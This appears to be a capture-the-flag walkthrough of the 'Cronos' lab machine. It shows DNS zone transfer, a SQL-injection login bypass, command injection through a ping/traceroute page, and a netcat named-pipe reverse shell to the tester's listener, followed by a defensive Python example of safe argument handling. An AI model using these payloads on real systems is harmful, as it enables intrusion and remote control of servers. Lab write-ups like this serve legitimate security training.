# 3 :53 dns

```
# to find out domain name for this machine
$ nslookup
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.

# using zone transfer to find out the different hostnames
$ host -l cronos.htb 10.10.10.13
Using domain server:
Name: 10.10.10.13
Address: 10.10.10.13#53
Aliases:

cronos.htb name server ns1.cronos.htb.
cronos.htb has address 10.10.10.13
admin.cronos.htb has address 10.10.10.13
ns1.cronos.htb has address 10.10.10.13
www.cronos.htb has address 10.10.10.13

$ dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 248 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Wed Aug 04 21:22:15 PDT 2021
;; XFR size: 7 records (messages 1, bytes 203)

# adding all to /etc/hosts

http://admin.cronos.htb/
Login Page

Using sqli authentication bypass cheatsheet,
admin' #
# worked

http://admin.cronos.htb/welcome.php
# Net Tool v0.1
# Traceroute and ping
# ping is seen via tcpdump

$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
21:39:00.546026 IP cronos.htb > 10.10.16.161: ICMP echo request, id 15926, seq 1, length 64
21:39:00.546044 IP 10.10.16.161 > cronos.htb: ICMP echo reply, id 15926, seq 1, length 64

# so the tool is running a terminal command; let's see if we can concatenate commands

traceroute 8.8.8.8;whoami;id;hostname
# gives us
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cronos

# reverse shell time
traceroute 8.8.8.8; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.161 6969 >/tmp/f

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.13] 37930
bash: cannot set terminal process group (1372): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cronos:/var/www/admin$ whoami;id
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www/admin$
```
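The `;` test above implies that the Net Tool concatenates the submitted host into a single shell string. The following is an added example, not part of the original notes and not the Net Tool's source (which the page does not show): it splits the page's test input the way a shell would, without executing anything, and contrasts that with a hardened argv builder. The function names, the allowlist and the IP-literal-only rule are assumptions.

```python
import ipaddress
import shlex

# Hypothetical allowlist mirroring the two actions the Net Tool offers.
ALLOWED_TOOLS = {"ping": ["ping", "-c", "1"], "traceroute": ["traceroute"]}
SEPARATORS = {";", "|", "||", "&", "&&"}

# Input taken from the notes above.
PAGE_INPUT = "8.8.8.8;whoami;id;hostname"


def vulnerable_command(tool, host):
    """Weak pattern: user input concatenated into one shell string."""
    return f"{tool} {host}"


def commands_seen_by_shell(command):
    """Split a string into the separate commands a POSIX shell would run.

    Analysis only: the string is tokenized, never executed.
    """
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def build_argv(tool, host):
    """Hardened pattern: allowlisted tool plus a validated IP literal.

    The returned list is meant for subprocess.run(argv, shell=False), so no
    shell ever parses the user's input. Rejecting hostnames is an assumption.
    """
    if tool not in ALLOWED_TOOLS:
        raise ValueError("unknown tool")
    address = ipaddress.ip_address(host)  # ValueError unless a literal IP
    return ALLOWED_TOOLS[tool] + [str(address)]


if __name__ == "__main__":
    print(commands_seen_by_shell(vulnerable_command("traceroute", PAGE_INPUT)))
    print(build_argv("traceroute", "8.8.8.8"))
```

Because `ipaddress.ip_address` accepts only a literal address, values that begin with `-` are rejected as well, which also closes off option injection into `ping` or `traceroute`.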

